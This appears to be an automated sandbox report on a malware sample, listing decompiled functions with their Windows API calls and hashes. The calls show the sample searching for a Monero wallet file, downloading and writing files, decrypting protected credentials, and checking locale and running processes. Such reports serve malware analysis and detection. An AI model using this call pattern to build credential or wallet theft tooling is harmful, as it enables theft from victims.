Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f6cc892ae364f46fe4203751ffcbe0f1a26b9c380d1afa0822f40f50e2343778
Instruction ID: 8fa5030dccd594055603ca7c1b4a8a0485c1a83898c809e177195f2414ae0852
Opcode Fuzzy Hash: f6cc892ae364f46fe4203751ffcbe0f1a26b9c380d1afa0822f40f50e2343778
Instruction Fuzzy Hash: 0412E2719105189BDB16FB60CC96EEE7778BF54301F404299B9066A0A1EF306F8DEFA1

Function 0034DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B0,00360C2A), ref: 0034DAEB
StrCmpCA.SHLWAPI(?,003614B4), ref: 0034DB33
StrCmpCA.SHLWAPI(?,003614B8), ref: 0034DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034DDCC
FindClose.KERNEL32(000000FF), ref: 0034DDDE

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c2c36b485c3f9b595e2ac0e0ea32dad4d5298f9c241e465757dde505378766d9
Instruction ID: 97bf038507ed816fb7f7d0ac91f2505cfde2451640cfd5611cc48b797141a90b
Opcode Fuzzy Hash: c2c36b485c3f9b595e2ac0e0ea32dad4d5298f9c241e465757dde505378766d9
Instruction Fuzzy Hash: C491747290060497CB16FBB0EC56DED777CAF98301F408659FD0A9E151EE34AB0D9B92

Function 003460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

InternetOpenA.WININET(00360DF7,00000001,00000000,00000000,00000000), ref: 0034610F
StrCmpCA.SHLWAPI(?,0127E768), ref: 00346147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0034618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003461B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003461DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0034620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00346249
InternetCloseHandle.WININET(?), ref: 00346253
InternetCloseHandle.WININET(00000000), ref: 00346260

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: efb2a714b250a0dc6706d83f6d36095f39c8fc16af705feee883e7cfd7e4dcfb
Instruction ID: 0e3c3e5d475eea7ae4e93f83946964e61bb5da4f2cd9f3ec79dfd71f73ba8cf8
Opcode Fuzzy Hash: efb2a714b250a0dc6706d83f6d36095f39c8fc16af705feee883e7cfd7e4dcfb
Instruction Fuzzy Hash: 95519470900208ABEB21DF60CC46BEE77B8FB44701F108599BA05BB1C0DBB46A89DF56

Function 00357B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
LocalFree.KERNEL32(00000000), ref: 00357D22

Strings

/ , xrefs: 00357C7F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
Instruction ID: 9666f6d0d2da6f650ceb0f5366fcfd7c4a407eed8eec851a26380b3d228e3f21
Opcode Fuzzy Hash: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
Instruction Fuzzy Hash: BB416F71940218ABDB25DB94DC89FEEB7B8FF44701F1042D9E809661A0DB342F89DFA1

Function 0034E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00360D73), ref: 0034E4A2
StrCmpCA.SHLWAPI(?,003614F8), ref: 0034E4F2
StrCmpCA.SHLWAPI(?,003614FC), ref: 0034E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0034EBDF

Strings

\*.*, xrefs: 0034E44D

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: fd798d52c037af4013af4e10579778a011c22b3b519a148b265d5b5221da20be
Instruction ID: bd99af1c764b13050292e4e42d58e7bbb33be44c4de7270e73a9c6b8cc054bb4
Opcode Fuzzy Hash: fd798d52c037af4013af4e10579778a011c22b3b519a148b265d5b5221da20be
Instruction Fuzzy Hash: 581264319105189ADB16FB60DC96EED7778BF54301F404299B90AAA0A1FF306F4DEF92

Function 00359600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0035961E
Process32First.KERNEL32(00360ACA,00000128), ref: 00359632
Process32Next.KERNEL32(00360ACA,00000128), ref: 00359647
StrCmpCA.SHLWAPI(?,00000000), ref: 0035965C
CloseHandle.KERNEL32(00360ACA), ref: 0035967A

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
Instruction ID: f1356414889b343083a51e497c3b00fefbaccb9f85040f5b90a263b534831446
Opcode Fuzzy Hash: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
Instruction Fuzzy Hash: 61014C75A00208EBDB11DFA4CC48FEDB7F8EB18311F10418AAD06A7250D7349B48DF51

Function 00357A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127E2E0,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127E2E0,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D
wsprintfA.USER32 ref: 00357AB7

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
Instruction ID: 80d00f46cc3b92038be748f0a790f86011bd52bcb779cd57212ec67c17de5865
Opcode Fuzzy Hash: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
Instruction Fuzzy Hash: 4B115EB1D45218EBEB208B54DC49FAAB778FB04721F10439AEE1AA32D0D7745A48CF51

Function 00349B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
LocalFree.KERNEL32(?), ref: 00349BD3

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
